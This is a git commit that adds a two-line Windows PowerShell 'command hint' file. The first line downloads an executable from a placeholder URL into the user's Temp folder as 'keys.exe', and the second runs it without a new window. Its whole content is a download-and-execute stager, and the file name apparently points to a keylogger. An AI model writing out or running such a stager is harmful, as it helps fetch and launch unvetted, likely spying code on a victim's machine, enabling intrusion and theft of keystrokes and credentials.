Adds windows powershell command hint

This commit is contained in:
Daniel Svitan 2025-03-24 12:31:48 +01:00
parent ca96620d6e
commit 3f03468ae2

2
windows-powershell.txt Normal file
View File

@ -0,0 +1,2 @@
Invoke-WebRequest URL -OutFile .\AppData\Local\Temp\keys.exe
Start-Process -FilePath .\AppData\Local\Temp\keys.exe -NoNewWindow